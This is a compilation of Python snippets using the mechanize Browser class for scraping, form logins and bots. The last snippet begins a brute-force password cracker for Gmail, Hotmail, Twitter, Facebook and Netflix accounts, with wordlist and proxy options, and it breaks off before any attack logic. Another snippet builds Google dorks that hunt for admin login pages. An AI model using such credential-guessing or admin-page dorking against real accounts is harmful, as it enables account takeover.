def main():

    parser = argparse.ArgumentParser()

    parser.add_argument('--total-jobs', metavar='<total-jobs>', help='total number of jobs downloading documents', type=int)
    parser.add_argument('--job', metavar='<job>', help='job number between 1 and <total-jobs>', type=int)

    args = parser.parse_args()
    check_args(parser, args)

    br = Browser()
    br.set_handle_robots(False)
#    br.set_debug_responses(True)

    data = urlencode({'user': USERNAME, 'pass': getpass()})

    document_urls = [LOGIN_PREFIX + url.strip() + '&view=etext' for url in file(DOCUMENT_URLS_FILE)]

    start = args.job - 1
    step = args.total_jobs

    for url in iterview(document_urls[start::step]):
        try:
            get_document_pages(br, url, data)
        except Exception as e:
            print >> sys.stderr, '\n', (url, e)
 def getScramArchByCMSSW(self):
     """
     Get from the list of available CMSSW releases
     return a dictionary of ScramArchitecture by CMSSW
     """
     
     # Set temporary conection to the server and get the response from cmstags
     url = 'https://cmssdt.cern.ch/SDT/cgi-bin/ReleasesXML'
     br = Browser()
     br.set_handle_robots(False)
     response=br.open(url)
     soup = BeautifulSoup(response.read())
     
     # Dictionary form
     # {'CMSSW_X_X_X':[slc5_amd64_gcc472], ... }
     archByCmssw={}
     
     # Fill the dictionary
     for arch in soup.find_all('architecture'): 
         for cmssw in arch.find_all('project'): 
             # CMSSW release
             cmsswLabel = cmssw.get('label').encode('ascii', 'ignore')
             if cmsswLabel not in archByCmssw:
                 archByCmssw[cmsswLabel]=[]
             # ScramArch related to this CMSSW release
             archName = arch.get('name').encode('ascii', 'ignore')
             archByCmssw[cmsswLabel].append(archName)
     
     return archByCmssw
Example #3
0
class GetPIN():
    def __init__(self,url,username, password):
        self.br = Browser()
        self.br.set_handle_equiv(False)
        self.br.set_handle_robots(False)
        self.url = url
        self.username = username
        self.password = password
 
    def getPIN(self):
        self.br.open(self.url)
        try:
            self.br.select_form(name="authZForm")
            self.br['userId'] = self.username
            self.br['passwd'] = self.password
            response = self.br.submit()
            data = response.readlines()
        except:
            data = self.br.response().readlines()
        pattern = r'<span class="fb">(.*?)</span>' 
        pat = re.compile(pattern)
        for line in data:
            if pat.search(line):
                verifier = pat.findall(line)
                break
        if len(verifier):
            return verifier[0]
        else:
            return -1
Example #4
0
 def __init__(self):
     Browser.__init__(self)
     self.set_handle_robots(False)
     self.addheaders = [(
         'Accept',
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
     )]
Example #5
0
    def on_task_start(self, task, config):
        try:
            from mechanize import Browser
        except ImportError:
            raise PluginError('mechanize required (python module), please install it.', log)

        userfield = config.get('userfield', 'username')
        passfield = config.get('passfield', 'password')

        url = config['url']
        username = config['username']
        password = config['password']

        br = Browser()
        br.set_handle_robots(False)
        try:
            br.open(url)
        except Exception as e:
            # TODO: improve error handling
            raise PluginError('Unable to post login form', log)

        #br.set_debug_redirects(True)
        #br.set_debug_responses(True)
        #br.set_debug_http(True)

        for form in br.forms():
            loginform = form

            try:
                loginform[userfield] = username
                loginform[passfield] = password
                break
            except Exception as e:
                pass
        else:
            received = os.path.join(task.manager.config_base, 'received')
            if not os.path.isdir(received):
                os.mkdir(received)
            filename = os.path.join(received, '%s.formlogin.html' % task.name)
            with open(filename, 'w') as f:
                f.write(br.response().get_data())
            log.critical('I have saved the login page content to %s for you to view' % filename)
            raise PluginError('Unable to find login fields', log)

        br.form = loginform

        br.submit()

        cookiejar = br._ua_handlers["_cookies"].cookiejar

        # Add cookiejar to our requests session
        task.requests.add_cookiejar(cookiejar)
        # Add handler to urllib2 default opener for backwards compatibility
        handler = urllib2.HTTPCookieProcessor(cookiejar)
        if urllib2._opener:
            log.debug('Adding HTTPCookieProcessor to default opener')
            urllib2._opener.add_handler(handler)
        else:
            log.debug('Creating new opener and installing it')
            urllib2.install_opener(urllib2.build_opener(handler))
def url_handler(data, lock):
    tweet = json.loads(data)
    if tweet['entities']['urls']:
        for index in range(len(tweet['entities']['urls'])):
            url = tweet['entities']['urls'][index]['expanded_url']
            try:
                tweet['entities']['urls'][index]['url_title'] = "-"
                br = Browser()
                br.open(url)
                title = br.title()
                if title == None:
                    title = "-"
                tweet['entities']['urls'][index]['url_title'] = title.encode('ascii','ignore')
            
            except (BrowserStateError, ParseError, UnicodeDecodeError, URLError):
                pass
    else:
        tweet
    lock.acquire()
    try:    
        try:
            global count
            f = open('json/tweets-' + str(count) + '.json', 'a')
            if f.tell() >= 9900000:
                f.close()
                count += 1
                f = open('json/tweets-' + str(count) + '.json', 'a')
            f.write(json.dumps(tweet) + "\n")
            f.close()
        except UnicodeDecodeError, e: 
            pass
    finally:
        lock.release()
Example #7
0
 def down_image(self, img):
     print "down image from " + img
     down_br = Browser()
     down_cj = CookieJar()
     down_br.set_cookiejar(down_cj)
     fn = tempfile.mktemp(suffix='.png')
     return down_br.retrieve(img, filename = fn)[0]
Example #8
0
def respond(bot, event):
    matches = []
    for (ident, (regex, template)) in bot.commands_cache.iteritems():
        match = regex.search(event.message)
        if match:
            params = match.groupdict()
            params['nick'] = event.source
            heappush(
                matches, (match.start(0), template.safe_substitute(params))
            )

    if not matches:
        if event.message.find("http") != -1:
            br = Browser()
            try:
                br.set_handle_robots(False)
                br.open(event.message)
                bot.send_channel_action(bot.config.messages.urltitle, title = format.bold('\"' + br.title() + '\"'))
            except:
                return False
            return True
        else:
            return False

    bot.send_channel_action(matches[0][1])
    return True
Example #9
0
  def GetXboxLiveFriends(self):
    """Return a list of tuples (gamer_tag, gamer_presence)."""
    br = Browser()
    br.open('http://live.xbox.com/en-US/profile/Friends.aspx')
    br.select_form(name='f1')
    br['login'] = self.login
    br['passwd'] = self.passwd
    br.submit()  # Submit login form.
    br.select_form(name='fmHF')
    response = br.submit()  # Submit redirect form.
    friend_list = response.read()
    response.close()

    soup = BeautifulSoup(friend_list)
    friend_table = soup.find('table', {'class': FRIEND_TABLE_CLASS})
    if friend_table is None:
      raise XboxLiveError('Parsing failure.')

    friends = []
    for row in friend_table.contents[1:]:  # Skip header row.
      gamer_tag = row.find('td', {'class': GAMER_TAG_CLASS})
      gamer_tag = str(gamer_tag.find('a').contents[0])
      gamer_presence = row.find('td', {'class': GAMER_PRESENCE_CLASS})
      gamer_presence = str(gamer_presence.find('h4').contents[0])
      friends.append((gamer_tag, gamer_presence))
    return friends
Example #10
0
def KILLMODE():
    global FIRE, cdown
    if (FIRE):
        cdown = cdown + 1
        global urlList, urlBList, Stats, stats
        # generate random ytube link
        x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)])
        while x in urlList or x in urlBList:
            print "Generated Duplicate Link; Re-generating"
            x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)])
        br = Browser()
        try:
            res = br.open("http://www.youtube.com/watch?v=" + x)
            data = res.get_data() 
            soup = BeautifulSoup(data)
            title = soup.find('title')
            # bad links are titled 'Youtube'
            if title.renderContents() != "YouTube":
                urlList.append("http://www.youtube.com/watch?v=" + x)
            # good links have other titles
            else:
                urlBList.append("http://www.youtube.com/watch?v="+ x)

        except HTTPError, e:
            print "Error ", e.code
            print "ERROR at:: http://www.youtube.com/watch?v=" + x

        Stats.set("TRIES THIS ATTEMPT: " + str(cdown) + "\nSUCCESS: " + str(len(urlList)) + "\nFAIL: " + str(len(urlBList)))
Example #11
0
    def login_to_kaggle(self):  
        """ Login to Kaggle website
        Parameters:
        -----------
        None
        
        Returns:
        browser: Browser
            a mechanizer Browser object to be used for further access to site
        """          
        
        if self.verbose:
            print("Logging in to Kaggle..."),

        br = Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        
        br.open(self.kag_login_url)
        
        br.select_form(nr=0)
        br['UserName'] = self.kag_username
        br['Password'] = self.kag_password
        br.submit(nr=0)
        
        if br.title() == "Login | Kaggle":
            raise KaggleError("Unable to login Kaggle with username %s (response title: %s)" % (self.kag_username,br.title()))
        
        if self.verbose:
            print("done!")
        
        return br
Example #12
0
def google(query):
    print("\n\t[!] Searching on Google...\n")
    print("[QUERY] >> " + query)

    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")

        with open("./output/google-%s.txt" % query[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                    for link in results.findAll(attrs={"class": "s"}):
                        l = link.cite.text
                        print(t)
                        print(l + '\n')
                        log.write(str(l) + '\n')

    except Exception as e:
        print(e)
def fetch_laws_page_from_year(year, temporaryDirectory):  
    lawsDirectory = os.path.join(temporaryDirectory, 'all_laws');
    if not os.path.exists(lawsDirectory):
        os.makedirs(lawsDirectory)
        print('The laws directory did not exist so I created it')
        print(lawsDirectory)

    fileToWriteLawsListIn = os.path.join(lawsDirectory, year + '.html')
    print('File to write in is ' + fileToWriteLawsListIn)
    lawWasNotDownloaded = not os.path.isfile(fileToWriteLawsListIn)
    if lawWasNotDownloaded:
        startDownload = int(round(time.time() * 1000))
        
        print('Getting laws from year ' + year)
        url = get_ugly_url_for_laws(year)
        browser = Browser()
        browser.open(url)
        html = browser.response().get_data()

        with open(fileToWriteLawsListIn, 'a') as f: 
            f.write (html)

        endDownload = int(round(time.time() * 1000))
        print('Finished downloading laws for year ' + year + '. It took only ' 
              + str(endDownload - startDownload) + ' milliseconds')
    else:
        print('This year was already fetched ' + year 
              + '. Skipping to the next year')
Example #14
0
    def __init__(self, request, username,password,context=''):
        """
        Al instanciar la classe, es loguejarà utilitzant el nom d'usuari i password proporcionats,
        Si browser_login conté algo són les cookies guardades de la última sessio loguejada que s'ha fet.
        Recarregarem les cookies en un Browser nou, i aixi estalviarà uns segons que consumiria del login.
        """
        self.context=context
        self.request=request
        registry = self.request.registry
        self.epitool=registry.getUtility(IEPIUtility)

        self.username = username
        self.password = password
        self.browser_login, elk = self.epitool.recoverBrowserSession(self.request, self.username,'presencia')
        if self.browser_login:
          self.br=Browser()
          self.br.set_handle_robots(False)
          cj = LWPCookieJar()
          self.br.set_cookiejar(cj)
          for co in self.browser_login:
              ck = Cookie(version=co['version'], name=co['name'], value=co['value'], port=co['port'], port_specified=co['port_specified'], domain=co['domain'], domain_specified=co['domain_specified'], domain_initial_dot=co['domain_initial_dot'], path=co['path'], path_specified=co['path_specified'], secure=co['secure'], expires=co['expires'], discard=co['discard'], comment=co['comment'], comment_url=co['comment_url'], rest=co['rest'])
              cj.set_cookie(ck)
          print "Logging-in into presencia via browser"
        else:
          self.br = Browser()
          self.br.set_handle_equiv(False)
          self.login(message=u"Logging-in into presencia via regular login")
          return
Example #15
0
 def newBrowser(self):
   # Create new browsers all the time because its data structures grow
   # unboundedly (texas#135)
   br = Browser()
   br.add_password(self.hostname, self.username, self.password)
   br.set_handle_robots(None)
   return br
Example #16
0
 def num_itens(self,busca, data_inicial, data_final):
     
     try:
         br = Browser()
         
         self.endereco = 'http://www.imprensaoficial.com.br/PortalIO/DO/BuscaDO2001Resultado_11_3.aspx?f=xhitlist&xhitlist_sel=title%3bField%3adc%3atamanho%3bField%3adc%3adatapubl%3bField%3adc%3acaderno%3bitem-bookmark%3bhit-context&xhitlist_vpc=first&xhitlist_s=&xhitlist_q=('\
                     +busca+\
                     ')&filtrotodoscadernos=True&xhitlist_xsl=xhitlist.xsl&filtrocadernossalvar=todos%2cexeci%2cjucii%2casb%2cexecii%2cjudciii%2cjc%2ctrt2r%2cjudel%2cjudipi%2cjudipii%2ctrt15r%2cemp%2csup%2cdouj%2cdom%2ctjm%2ctre%2ctrt2aa%2cjfd%2coab&xhitlist_mh=9999&filtropalavraschave='\
                     +busca
                     
         response1 = br.open(self.endereco)
         
         texto = response1.read()
 
         x1, x2, x3 = texto.partition('<span id="lblDocumentosEncontrados" class="tx_red">')
         x3, x2, x1 = x3.partition("</span></td>")
                     
         x3 = x3.replace(",","")
         x3 = x3.strip()
         #Retorna o número de itens achados
         if x3 == "Um":
             return 1
     except:
         print("Erro no endereço!")
         print(self.endereco)
         x3 = "0"
     
     if len(x3) > 0:
         return int(x3)
     else:
         return 0
Example #17
0
    def submit(self, timestamp, username, password, t_id, t_short, files, language):
        """Execute the request for a submission.

        timestamp (int): seconds from the start.
        username (string): username issuing the submission.
        password (string): password of username.
        t_id (string): id of the task.
        t_short (string): short name of the task.
        files ([dict]): list of dictionaries with keys 'filename' and
                        'digest'.
        language (string): the extension the files should have.

        """
        logger.info("%s - Submitting for %s on task %s." % (to_time(timestamp), username, t_short))
        if len(files) != 1:
            logger.error("We cannot submit more than one file.")
            return

        # Copying submission files into a temporary directory with the
        # correct name. Otherwise, SubmissionRequest does not know how
        # to interpret the file (and which language are they in).
        temp_dir = tempfile.mkdtemp(dir=config.temp_dir)
        for file_ in files:
            temp_filename = os.path.join(temp_dir, file_["filename"].replace("%l", language))
            shutil.copy(os.path.join(self.import_source, "files", files[0]["digest"]), temp_filename)
            file_["filename"] = temp_filename

        filename = os.path.join(files[0]["filename"])
        browser = Browser()
        browser.set_handle_robots(False)
        step(LoginRequest(browser, username, password, base_url=self.cws_address))
        step(SubmitRequest(browser, (int(t_id), t_short), filename=filename, base_url=self.cws_address))
        shutil.rmtree(temp_dir)
Example #18
0
class Du8Doc:

    def __init__(self):
        self.br = Browser()
        
    def from_html(self, html):
        text = re.sub("<.+>\n", "", html)
        text = re.sub("</.+>\n", "", text)
        text = re.sub('(<br/?>\s*)+', '\n', text)
        text = re.sub('&nbsp;', ' ', text)
        return text

    def get_links(self, url):
        res = self.br.open(url)
        data = res.get_data() 
        soup = BeautifulSoup(data, "html5lib")
        div_content = soup.find('table')
        urls = div_content.find_all("a")
        return [url.get('href') for url in urls ]        
        
    def get_content(self, link):
        res = self.br.open(link)
        data = res.get_data() 
        soup = BeautifulSoup(data, "html5lib")
        title, chapter = soup.html.title.string.split("-")[0:2]
        div_content = soup.find(id="content").prettify()
        content = self.from_html(div_content)
        return title, chapter, content
Example #19
0
	def google(self):
		print("\n\t[!] Searching on Google...\n")

		if self.dork == None:
			query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)"
		else:
			query = "".join(self.dork)
			query = query.strip("'")

		print("[DORK] >> " + query)

		try:
			query = query.replace(" ", "+")
			req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
			br = Browser()
			br.set_handle_robots(False)
			br.addheaders = [("User-agent", "chrome")]
			html = br.open(req).read() 
			soup = BeautifulSoup(html, "html5lib")

			with open("./output/google-%s.txt" % self.target[8:], "w") as log:
				for results in soup.findAll(attrs={"class":"g"}):
					for title in results.findAll("h3", attrs={"class":"r"}):
						t = title.text
						t = t.title()
					for link in results.findAll(attrs={"class":"s"}):
						l = link.cite.text
						print (t)
						print (l + '\n')
						log.write(str(l) + '\n')
		
		except Exception as e:
			print(e)
Example #20
0
def name(request, string):

    movie = string.replace("_", "+")
    br = Browser()
    br.open("http://www.imdb.com/find?s=tt&q="+movie)
    link = br.find_link(url_regex=re.compile(r"/title/tt.*"))
    data = br.follow_link(link)
    soup = BeautifulSoup(data.read())

    title = soup.find('h1').contents[0].strip()
    name = title.replace("&nbsp;", "")
    rating = soup.find('span', itemprop='ratingValue').contents[0]
    duration = soup.find('time', itemprop='duration').contents[0].strip()
    releaseDate = soup.find('a', title='See more release dates').contents[0]
    director = soup.find('span', itemprop='director').getText()
    actor_all = []
    actors = soup.findAll('span', itemprop='actors')
    for i in range(len(actors)):
        actor_all.append((actors[i].contents[1]).getText())
    genres_all = []
    genres = soup.findAll('span', itemprop='genre')
    for i in range(len(genres)):
        genres_all.append(genres[i].getText())

    jsonObject = {}
    jsonObject['Name:'] = name
    jsonObject['IMDB Rating:'] = rating
    jsonObject['Duration'] = duration
    jsonObject["Actors: "] = actor_all
    jsonObject['Director:'] = director
    jsonObject['Genres'] = genres_all
    jsonObject['Release Date'] = releaseDate
    movie_details = json.dumps(jsonObject)
    return HttpResponse(movie_details)
Example #21
0
 def parseFeeds(self):
     mech = Browser()
     mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ]
     mech.set_handle_robots(False)
     for url in self.feedUrls:
     #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml"
         page = mech.open(url)
         html = page.read()
         soup = BeautifulStoneSoup(html)
         headlines = []
         descriptions = []
         i=0
         self.newsList = []
         for item in soup.findAll('item'):
             if (i > 20):
                 break
             date = item.find('pubdate')
             title = item.find('title')
             link = item.find('link')
             desc = item.find('description')
             if (len(title.contents) > 0):
                 title2 = title.contents[0]
             else:
                 title2 = 'None'
             self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \
                 desc.contents[0]))
             i+=1
         for story in self.newsList:
             headlines.append(story.title)
             descriptions.append(story.link)
             #story.display()
         self.headlineList.append(headlines)
         self.descList.append(descriptions)
     self.populateTopicList()
    def getLastEntries(self, url, lastDate):
        """ get all entries from an HTML table list if it is newer 
        than prevEntry. Format is from graz FF site """

        mech = Browser()
        mech.set_handle_robots(False)
        try:
            page = mech.open(url)
        except urllib2.HTTPError:
            if url == None:
                url = "(empty url)"
            self.logger.error("Could not read url "+url)
            return []
        html = page.read()
        soup = BeautifulSoup(html)
        link = soup.findAll('a')
        if len(link) == 0:
            logger.error('No links in the page: %s', url)
            return []
        returnLinks = []

        for l in link:
            try:
                date = datetime.strptime(l.string, "topo-%Y-%m-%d-%H:%M.tsv.gz")
            except ValueError:
                continue
            if date > lastDate:
                returnLinks.append(url+l.string)
            else:
                break

        return returnLinks
Example #23
0
def mrsc(gid):
	mech = Browser()
	url = "http://espn.go.com/ncf/playbyplay?gameId="+gid+"&period=0"
	#print url
	page = mech.open(url)
	html = page.read()
	print url
	if html.count('Play-by-play not currently available.') == 0:
		soup = BeautifulSoup(html)
		table = soup.findAll("table")[-1]
		rows = table.findAll('tr')[::-1]
		c=0
		toret=''
		keepgoing=True
		cup=html[::-1][:html[::-1].find(' left; font: 700 14px/25px Helvetica,Arial,sans-serif;" colspan="3"><div style="margin-right: 6px;"'[::-1])][::-1]
		cup=cup[cup.find('a name="')+len('a name="'):]
		cup=cup[:cup.find('"')]
		while c < 7 and keepgoing and c < len(rows):
			cols = rows[c].findAll('td')
			#print rows[c]
			if len(cols) > 2:
				#if str(cols[2]) != '<td>&nbsp;</td>' and str(cols[3]) != '<td>&nbsp;</td>':
				toret=str(' '.join(cols[0].findAll(text=True)))+'. '+str(' '.join(cols[1].findAll(text=True)))
				keepgoing=False
			c=c+1
		toret=toret.replace('  ',' ').strip()
		if toret != '': toret=toret+' '
		poss=''
		if cup != '' and len(cup) < 30: poss=cup
	else:
		toret=''
		poss=''
	return [toret,poss]
Example #24
0
    def num_itens(self,busca, data_inicial, data_final):
        br = Browser()
        response1 = \
            br.open("http://portal.in.gov.br/in/imprensa1/pesquisa_avancada")
        br.select_form(name="formBusca")
        br["texto_todas"] = busca
        br["dataPublicacaoInicial"] = data_inicial[:5]
        br["dataPublicacaoFinal"] = data_final[:5]
        br["ano"] = [data_final[-4:]]
        br["idJornal"] = ["1", "2", "3", "4"]
#        print(br.form)
        br.form.action = \
            "http://www.in.gov.br/imprensa/pesquisa/pesquisaresultado.jsp"
        res = br.submit()
        texto = res.read()
        x1, x2, x3 = texto.partition("ite")
        x1, x2, x3 = x1.rpartition(">")
        
        try:
            arq = open(self.retornar_html(),"w")
            arq.write(texto)
            arq.close()
        except:
            print("Erro ao tentar salvar página de buscas!")
        
        x3 = x3.replace(",","")
        x3 = x3.strip()
        #Retorna o número de itens achados
        if x3 == "Um":
            return 1
        
        if len(x3) > 0:
            return int(x3)
        else:
            return 0
Example #25
0
def scrap_query(query, bang=None):

    r = ddg_query('imbd ' + query, bang=bang)
    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None

    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\
                        WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\
                        Chrome/23.0.1271.97 Safari/537.11')]

    r = br.open(url)
    soup = BeautifulSoup(r)


    for link in soup.find_all('a'):
        href = link.get('href','')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id

    return None
Example #26
0
def gen_path(request):
    x = json.loads(request.POST['data'])    #fetches data
    print x
    adj_mat = []    #creates empty adjacency matrix
    i1 = j1 = 0
    num_cities = len(x)
    for i in x:
        tmp_mat = []
        for j in x:
            if i!=j:
                API_KEY = "AIzaSyDBOSr6_XxvISPGX54P9bPnooE3RUpRTp0"
                orig_coord = x[i]
                dest_coord = x[j]
                br = Browser()  #creates mechanize instance
                br.set_handle_robots(False)
                # print "https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)
                result = br.open("https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)).read()    #makes a call to GoogleMapsAPI
                json_result = json.loads(result)
                tmp_mat.append(int(json_result['rows'][0]['elements'][0]['distance']['value']))
            else:
                tmp_mat.append(0)
        adj_mat.append(tmp_mat)



    obj = ArpanDaErCode()
    ans = ""
    ans = ArpanDaErCode.solve(obj, adj_mat, num_cities) #gets sequence from model
    print ans
    ret = {'data': [str(ii) for ii in ans]}

    return HttpResponse(str(json.dumps(ret)))   #returns the sequens in JSON format for the JS to handle
    def __init__(self,options):
        (self.configfile,self.config,self.moduleconfig) = self.initialize_config(options)
        # If we have a particular log level for this module, use that,
        # otherwise use the global log level. If that isn't defined
        # either, use the INFO loglevel.
        if 'log' in self.moduleconfig:
            loglevel = self.moduleconfig['log']
        else:
            loglevel = self.config.get('log','INFO')
        self.log = self.setup_logger(self.module_dir,loglevel)

        self.base_dir = self.config['datadir']

        if self.browser_use_robustfactory:
            self.browser = Browser(factory=RobustFactory())
        else:
            self.browser = Browser()
        self.browser.addheaders = [('User-agent', 'lagen.nu-bot ([email protected])')]

        # logger = logging.getLogger("mechanize")
        # logger.addHandler(logging.StreamHandler(sys.stdout))
        # logger.setLevel(logging.DEBUG)
        # self.browser.set_debug_http(True)
        # self.browser.set_debug_responses(True)
        # self.browser.set_debug_redirects(True)


        self.ns = {'rinfo':  Namespace(Util.ns['rinfo']),
                   'rinfoex':Namespace(Util.ns['rinfoex']),
                   'dct':    Namespace(Util.ns['dct'])}
Example #28
0
def lookup_offers_isbn(item_id):
    offers = []
    br = Browser()
    res = br.open("http://books.half.ebay.com/ws/web/HalfISBNSearch?isbn=%s" % item_id)
    soup = BeautifulSoup(res.read())
    ratings = soup.findAll('span',{'class': 'Header'})
    for r in ratings:
        rating = r.text
        prices= r.parent.parent.parent.findNextSibling('table').findAll('tr')[1:]
        linktext  = r.parent.parent.parent.findNextSiblings('table')[1].find(text=re.compile('View all.*'))
        if linktext:
            all = linktext.parent['href']
            # get link
            res2 = br.open(all)
            soup = BeautifulSoup(res2.read())
            rating2 = soup.findAll('span',{'class': 'Header'})
            prices = rating2[0].parent.parent.parent.parent.findAll('table')[3].findAll('tr')[1:]
        for row in prices:
            m = re.search("itemid=(\d+)",row.find('a',href=re.compile("itemid=\d+"))['href'])
            itemid=m.group(1)
            seller = row.find('a',{'class':'SellerDisplayLink'}).text
            price = row.find('span',{'class':'ItemPrice'}).text
            price = string.replace(price,",","")
            if price.startswith("$"):
                price = price[1:]
            offers.append({ 'rating' : rating, 'seller' : seller, 'listing_id' : itemid, 'price' : str(price) })
            print rating,seller,itemid,price
    return offers
def respond(permalink, text):
    br = Browser()
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
    br.addheaders = [('User-agent', user_agent)]

    soup = BeautifulSoup(br.open(permalink).read())

    urlopen = urllib2.urlopen
    Request = urllib2.Request
    encode = urllib.urlencode
    cj = cookielib.LWPCookieJar()

    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)

    root_comment = soup.find('form', attrs={'class': 'usertext border'})
    thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value']
    print 'thing_id', thing_id

    # LOG THE F**K IN
    req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.loads(req_open.read())

    modhash = read['json']['data']['modhash']

    # POST THE F*****G COMMENT
    req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.dumps(req_open.read())
Example #30
0
def login_url(
                url,
                login,
                passwd,
                form_nomber,
                login_name,
                paswd_name,
                submit_nomber
            ):
    br = Browser(); showMessage('Создаю интерфейс браузера')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.open(url); showMessage('Загружаю сайт и произвожу вход')
    br.select_form(nr = form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd

    res = br.submit(nr = submit_nomber)
    content = res.read()
    #определить число страниц
    maxPage = int(max_page(content)); showMessage('Определяю количество страниц и перехожу на последнюю')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()
    #парсинг ключей
    if get_all_keys(content):
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) # Вернет True и откроет вкладку
Example #31
0
 def set_debug_redirect(self, *args, **kwargs):
     B.set_debug_redirect(self, *args, **kwargs)
     self._clone_actions['set_debug_redirect'] = ('set_debug_redirect',
             args, kwargs)
Example #32
0
 def set_handle_equiv(self, *args, **kwargs):
     B.set_handle_equiv(self, *args, **kwargs)
     self._clone_actions['set_handle_equiv'] = ('set_handle_equiv',
             args, kwargs)
Example #33
0
 def set_handle_refresh(self, *args, **kwargs):
     B.set_handle_refresh(self, *args, **kwargs)
     self._clone_actions['set_handle_refresh'] = ('set_handle_refresh',
             args, kwargs)
Example #34
0
 def set_handle_gzip(self, handle):
     B._set_handler(self, '_gzip', handle)
     self._clone_actions['set_handle_gzip'] = ('set_handle_gzip',
             (handle,), {})
Example #35
0
class BetFair():
    def __init__(self, url, filename, sample_time, n_attempts=2):
        self.filename = filename
        self.sample_time = sample_time
        self.n_attempts = n_attempts
        sleep_time = 5
        self.url = url
        self.br = Browser()

        while (True):
            attempt = 0
            for attempt in range(n_attempts):
                try:
                    self._load_page()
                    self.write_games_odds()
                    break
                except:
                    print('Erro!')
                    time.sleep(sleep_time)

            time.sleep(self.sample_time - attempt * sleep_time)

    def _load_page(self):
        self.time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        page_content = self.br.open(self.url).read()
        page = BeautifulSoup(page_content, "lxml")
        page = page.find_all('div', class_='content-multipick')
        self.page = page[0].find_all('div',
                                     class_='details-market market-3-runners')

    def _get_games_odds(self, pg):

        #TODO: tirar a porra desse slice
        start = str(pg.find_all('a')[0]).find('data-galabel')
        end = str(pg.find_all('a')[0]).find('data-loader')
        teams = str(pg.find_all('a')[0])[start + 14:end - 11].split(' x ')
        team1 = teams[0]
        team2 = teams[1]

        x1 = str(pg.find_all('a')[1].find().get_text().replace('\n', ''))
        x2 = str(pg.find_all('a')[2].find().get_text().replace('\n', ''))
        x3 = str(pg.find_all('a')[3].find().get_text().replace('\n', ''))

        return [team1, team2, x1, x2, x3]

    def write_games_odds(self):
        for pg in self.page:
            self._write_file(self._get_games_odds(pg))

    def _write_file(self, line):
        try:
            with open(self.filename, "a") as f:
                f.write('\n' + self.time)
                for x in line:
                    f.write(';' + x)
        except:
            print('Criando arquivo: ' + self.filename)
            with open(self.filename, "w") as f:
                f.write('\n' + self.time)
                for x in line:
                    f.write(';' + x)
Example #36
0
 def set_cookiejar(self, *args, **kwargs):
     B.set_cookiejar(self, *args, **kwargs)
     self._clone_actions['set_cookiejar'] = ('set_cookiejar', args, kwargs)
def bruteforce(self):
    progress = Progressbar(self,
                           orient=HORIZONTAL,
                           length=200,
                           mode='determinate')
    progress.place(x=600, y=200)
    use = OptionParser()

    use.add_option("-g",
                   "--gmail",
                   dest="gmail",
                   help="Write Your Account gmail")
    use.add_option("-t",
                   "--hotmail",
                   dest="hotmail",
                   help="Write Your Account hotmail")
    use.add_option("-T",
                   "--twitter",
                   dest="twitter",
                   help="Write Your Account twitter")
    use.add_option("-f",
                   "--facebook",
                   dest="facebook",
                   help="Write Your Account facebook")
    use.add_option("-n",
                   "--netflix",
                   dest="netflix",
                   help="Write Your Account Netflix")
    use.add_option("-l",
                   "--list",
                   dest="list_password",
                   help="Write Your list passowrd")
    use.add_option("-p",
                   "--password",
                   dest="password",
                   help="Write Your passowrd ")
    use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
    (options, args) = use.parse_args()

    brows = Browser()
    brows.set_handle_robots(False)
    brows._factory.is_html = True
    brows.set_cookiejar(cookielib.LWPCookieJar())
    useragents = [
